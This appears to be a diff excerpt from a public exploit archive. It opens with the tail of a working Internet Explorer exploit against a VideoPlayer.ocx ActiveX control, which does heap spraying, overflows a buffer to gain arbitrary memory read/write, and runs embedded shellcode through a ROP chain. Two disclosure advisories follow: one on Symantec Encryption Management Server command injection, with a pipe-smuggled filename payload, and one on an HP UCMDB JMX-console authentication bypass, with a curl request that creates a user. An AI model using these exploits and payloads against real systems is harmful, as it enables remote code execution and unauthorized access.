/* spray the heap with array data blocks and subsequent typed array headers
of type Uint32Array */
k = 0
while(k < nrArrays){
/* create "jscript9!Js::JavascriptArray" with blocksize 0xf000 (data
aligned at 0xXXXX0020) */
arr[k] = new Array(arrSize);
/* fill remaining page (0x1000) after array data with headers of
"jscript9!Js::TypedArray<unsigned int>" (0x55 * 0x30 = 0xff0) as a
typed array header has the size of 0x30. 0x10 bytes are left empty */
for(var i= 0; i<0x55; i++){
/* headers become aligned @ 0xXXXXf000, 0xXXXXf030, 0xXXXXf060,.. */
arr[k][i] = new Uint32Array(intArrBuf, 0, 1);
}
/* tag the array's last element */
arr[k][arrSize - 1] = 0x12121212
k += 1;
}
/* perform controlled memwrite to 0x1111f010: typed array header is at
0x1111f000 to 0x1111f030 => overwrite array data header @ 11111f010 with
0x00000001 0x00000004 0x00000040 0x1111f030 0x00
The first 3 dwords are sideeffects due to the code we abuse for the
controlled memcpy */
addr = 0x1111f010 // WHERE TO WRITE
/* prepare buffer with address we want to write to */
ptrBuf = ""
/* fill buffer: length = relative pointer address - buffer start + pointer
offset */
while (ptrBuf.length < (0x92068 - 0x916a8 + 0xC)){ptrBuf += "A"}
ptrBuf += dword2str(addr)
/* trigger: overflow buffer and overwrite the pointer value after buffer */
obj.SetText(ptrBuf,0,0)
//alert("buffer overflown => check PTR @ videop_1+92068: dc videop_1+92068")
/* use overwritten pointer after buffer with method "SetFontName" to conduct
memory write. We overwrite a typed array's header length to 0x40 and let
its buffer point to the next typed array header at 0x1111f030 (see above)
*/
obj.SetFontName(dword2str(addr+0x20)) // WHAT TO WRITE
/* find the corrupted Uint32Array (typed array) */
k = 0
arrCorrupt = 0
while(k < 0x1000-1){
for(var i = 0; i < 0x55-1; i++){
if(arr[k][i][0] != 0){
// address of jscript9!Js::TypedArray<unsigned int>::`vftable'
//alert("0x" + arr[k][i][0].toString(16))
arrCorrupt = 1
break
}
}
if (arrCorrupt == 1) break
k++
}
if (!arrCorrupt){
alert("cannot find corrupted Uint32Array")
return -1
}
/* modify subsequent Uint32Array to be able to RW all process memory */
arr[k][i][6] = 0x7fffffff // next Uint32Array length
arr[k][i][7] = 0 // set buffer of next Uint32Array to start of process mem
/* our memory READWRITE interface :) */
mem = arr[k][i+1]
//alert(mem.length.toString(16))
if (mem.length != 0x7fffffff){
alert("Cannot change Uint32Array length")
return -2
}
/* now we could even repair the change we did with memcpy ... */
/* leak several pointers and calculate VideoPlayer.ocx base */
arr[k+1][0] = obj // set HTMLObjectElement as first element
//alert(mem[0x11120020/4].toString(16))
arrayElemPtr = mem[(addr + 0x1010)/4] // leak array elem. @ 0x11120020 (obj)
objPtr = mem[arrayElemPtr/4 + 6] // deref array elem. + 0x18
heapPtrVideoplayer = mem[objPtr/4 + 25] // deref HTMLObjectElement + 0x64
/* deref heap pointer containing VideoPlayer.ocx pointer */
videoplayerPtr = mem[heapPtrVideoplayer/4]
base = videoplayerPtr - 0x6b3b0 // calculate base
/* check if we have the image of VideoPlayer.ocx
check for MZ9000 header and "Vide" string at offset 0x6a000 */
if (mem[base/4] != 0x905a4d ||
mem[(base+0x6a000)/4] != 0x65646956){
alert("Cannot find VideoPlayer.ocx base or its version is wrong")
return -3
}
//alert(base.toString(16))
/* get VirtualAlloc from imports of VideoPlayer.ocx */
virtualAlloc = mem[(base + 0x69174)/4]
/* memcpy is available inside VideoPlayer.ocx */
memcpy = base + 0x15070
//alert("0x" + virtualAlloc.toString(16) + " " + 0x" + memcpy.toString(16))
/* create shellcode (./msfvenom -p windows/exec cmd=calc) */
sc = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"+
"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"+
"\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"+
"\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b"+
"\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0"+
"\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b"+
"\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01"+
"\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2"+
"\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"+
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"+
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"+
"\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b"+
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd"+
"\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"+
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"+
"\x00"
scBuf = new Uint8Array(sc.length)
for (n=0; n<sc.length; n++){
scBuf[n] = sc.charCodeAt(n)
}
/* leak shellcode address */
arr[k+1][0] = scBuf
/* therefore, leak array element at 0x11120020 (typed array header of
Uint8Array containing shellcode) ... */
elemPtr = mem[(addr + 0x1010)/4]
/* ...and deref array element + 0x1c (=> leak shellcode's buffer address) */
scAddr = mem[(elemPtr/4) + 7]
//alert(scAddr.toString(16))
/* create and leak rop buffer */
rop = new Uint32Array(0x1000)
arr[k+1][0] = rop
/* leak array element at 0x11120020 (typed array header) */
elemPtr = mem[(addr + 0x1010)/4]
/* deref array element + 0x1c (leak rop's buffer address) */
pAddr = mem[(elemPtr/4) + 7] // payload address
/* ROP chain (rets in comments are omitted) */
/* we perform:
(void*) EAX = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_RWX)
memcpy(EAX, shellcode, shellcodeLen)
(void(*)())EAX() */
offs = 0x30/4 // offset to chain after CALL [EAX+0x30]
rop[0] = base + 0x1ff6 // ADD ESP, 0x30;
rop[offs + 0x0] = base + 0x1ea1e // XCHG EAX, ESP; <-- first gadget called
rop[offs + 0x1] = virtualAlloc // allocate RWX mem (address avail. in EAX)
rop[offs + 0x2] = base + 0x10e9 // POP ECX; => pop the value at offs + 0x7
rop[offs + 0x3] = 0 // lpAddress
rop[offs + 0x4] = 0x1000 // dwSize (0x1000)
rop[offs + 0x5] = 0x1000 // flAllocationType (MEM_COMMIT)
rop[offs + 0x6] = 0x40 // flProtect (PAGE_EXECUTE_READWRITE)
rop[offs + 0x7] = pAddr + (offs+0xe)*4 // points to memcpy's dst param (*2)
rop[offs + 0x8] = base + 0x1c743 // MOV [ECX], EAX; => set dst to RWX mem
rop[offs + 0x9] = base + 0x10e9 // POP ECX;
rop[offs + 0xa] = pAddr + (offs+0xd)*4 // points to (*1) in chain
rop[offs + 0xb] = base + 0x1c743 // MOV [ECX], EAX; => set return to RWX mem
rop[offs + 0xc] = memcpy
rop[offs + 0xd] = 0xffffffff // (*1): ret addr to RWX mem filled at runtime
rop[offs + 0xe] = 0xffffffff // (*2): dst for memcpy filled at runtime
rop[offs + 0xf] = scAddr // shellcode src addr to copy to RWX mem (param2)
rop[offs + 0x10] = sc.length // length of shellcode (param3)
/* manipulate object data to gain EIP control with "Play" method */
videopObj = mem[objPtr/4 + 26]
mem[(videopObj-0x10)/4] = pAddr // pAddr will be used in EAX in below call
/* eip control @ VideoPlayer.ocx + 0x6643B: CALL DWORD PTR [EAX+0x30] */
obj.Play()
}
/* dword to little endian string */
function dword2str(dword){
str = ""
for (n=0; n<4; n++){
str += String.fromCharCode((dword >> 8*n) & 0xff)
}
return str
}
//setTimeout(run(), 3000);
</script>
</body>
</html>

89
platforms/windows/remote/35949.txt Executable file
View file

@ -0,0 +1,89 @@
Vantage Point Security Advisory 2014-007
========================================
Title: Symantec Encryption Management Server - Remote Command Injection
ID: VP-2014-007
Vendor: Symantec
Affected Product: Symantec Encryption Gateway
Affected Versions: < 3.2.0 MP6
Product Website: http://www.symantec.com/en/sg/gateway-email-encryption/
Author: Paul Craig <paul[at]vantagepoint[dot]sg
Summary:
---------
Symantec Gateway Email Encryption provides centrally managed email encryption
to secure email communications with customers and partners regardless of whether
or not recipients have their own email encryption software.
With Gateway Email Encryption, organizations can minimize the risk of
a data breach while complying with regulatory mandates for information
security and privacy.
Details:
---------
Remote Command Injection vulnerabilities occur when user supplied
input is used directly as a command line argument to a fork(), execv()
or a CreateProcessA() function.
It was found that the binary /usr/bin/pgpsysconf calls the binary
/usr/bin/pgpbackup with unfiltered user supplied input when restoring
a Database Backup from the Symantec Encryption Management Web
Interface .
The user supplied 'filename' value is used directly as a command
argument, and can be concatenated to include additional commands with
the use of the pipe character.
This can allow a lower privileged Administrator to compromise the
Encryption Management Server.
This is demonstrated below in a snippet from pgpsysconf;
.text:08058FEA mov dword ptr [ebx], offset
aUsrBinPgpbacku ; "/usr/bin/pgpbackup"
.text:08058FF0 cmp [ebp+var_1D], 0
.text:08058FF4 jnz short loc_8059049
.text:08058FF6 mov ecx, 4
.text:08058FFB mov edx, 8
.text:08059000 mov eax, 0Ch
.text:08059005 mov dword ptr [ebx+ecx], offset unk_807AE50
.text:0805900C mov [ebx+edx], esi
.text:0805900F mov dword ptr [ebx+eax], 0
.text:08059016 call _fork ; Bingo..
An example to exploit this vulnerability and run the ping command can
be seen below.
POST /omc/uploadBackup.event ....
....
Content-Disposition: form-data; name="file";
filename="test123|`ping`|-whatever.tar.gz.pgp"
This vulnerability can be further exploited to gain local root access
by calling the setuid binary pgpsysconf to install a local package
file.
Fix Information:
---------
Upgrade to Symantec Encryption Management Server 3.3.2 MP7.
See http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150129_00
for more information
Timeline:
---------
2014/11/26: Issue Reported.
2015/01/30: Patch Released.
About Vantage Point Security:
---------
Vantage Point Security is the leading provider for penetration testing
and security advisory services in Singapore. Clients in the Financial,
Banking and Telecommunications industries select Vantage Point
Security based on technical competency and a proven track record to
deliver significant and measurable improvements in their security
posture.
Web: https://www.vantagepoint.sg/
Contact: office[at]vantagepoint[dot]sg

122
platforms/windows/webapps/35982.txt Executable file
View file

@ -0,0 +1,122 @@
Mogwai Security Advisory MSA-2015-02
----------------------------------------------------------------------
Title: Hewlett-Packard UCMDB - JMX-Console Authentication Bypass
CVE-ID: CVE-2014-7883
Product: Hewlett-Packard Universal CMDB (UCMDB)
Affected versions: UCMDB 10.10 (Other versions might also be affected)
Impact: high
Remote: yes
Product link: http://www8.hp.com/us/en/software-solutions/configuration-management-system-database/index.html
Reported: 14/11/2014
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
----------------------------------------------------------------------
The HP Universal CMDB (UCMDB) automatically collects and manages accurate and
current business service definitions, associated infrastructure relationships and
detailed information on the assets, and is a central component in many of the key processes in your
IT organization, such as change management, asset management, service management, and business
service management. The UCMDB ensures that these processes can rely on comprehensive and
true data for all business services. Together with HP UCMDB Configuration Manager
(UCMDB-CM) you can standardize your IT environments, and make sure they comply with clear
policies, and defined authorization process.
Many IT organizations turn to a CMDB and configuration management processes to create a
shared single version of truth to support business service management, IT service management,
change management, and asset management initiatives. These initiatives help align IT efforts
with business requirements and run IT operations more efficiently and effectively.
The initiatives success depends on the CMDB providing a complete view into the
configuration items (CIs) and assets as well as how various IT elements relate together to deliver
the business service.
-----------------------------------------------------------------------
Business recommendation:
-----------------------------------------------------------------------
Apply configuration changes from HP
https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsearch/document/KM01351169
-- CVSS2 Ratings ------------------------------------------------------
CVSS Base Score: 6.4
Impact Subscore: 4.9
Exploitability Subscore: 10
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:N)
-----------------------------------------------------------------------
Vulnerability description:
----------------------------------------------------------------------
UCMB administrators heavily rely on a JMX-Console, which is installed by
default.
The JMX-Console web application in UCMDB performs access control only for
the GET and POST methods, which allows remote attackers to send requests
to this application's GET handler by using a different method (for example
HEAD).
The web.xml file of the JMX Console contains following security constrains:
<security-constraint>
<web-resource-collection>
<web-resource-name>Protected Pages</web-resource-name>
<url-pattern>/*</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>sysadmin</role-name>
</auth-constraint>
</security-constraint>
<security-constraint>
<web-resource-collection>
<web-resource-name>Callhome Servlet</web-resource-name>
<url-pattern>/callhome</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
</web-resource-collection>
</security-constraint>
This vulnerability is identical with CVE-2010-0738 (JBoss JMX-Console
Authentication bypass). This can be used to create a new account which
can then be used to access the JMX console.
Proof of concept:
----------------------------------------------------------------------
The following Curl command will send a HEAD request to create a new user
"pocuser" in the UCMDB Backend:
curl -I
"http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser"
Disclosure timeline:
----------------------------------------------------------------------
14/11/2014: Reporting issue to HP
18/11/2014: Re-Reporting, as no acknowledge received
18/11/2014: Acknowledge from HP
02/01/2015: Requesting status update from HP
29/01/2015: Requesting status update from HP
31/01/2015: Response from HP, they plan to release the advisory next week
02/05/2015: HP releases security bulletin
03/05/2015: Mogwai security bulletin release
Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab
References:
----------------------------------------------------------------------
Official HP security bulletin
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04553906
----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info@mogwaisecurity.de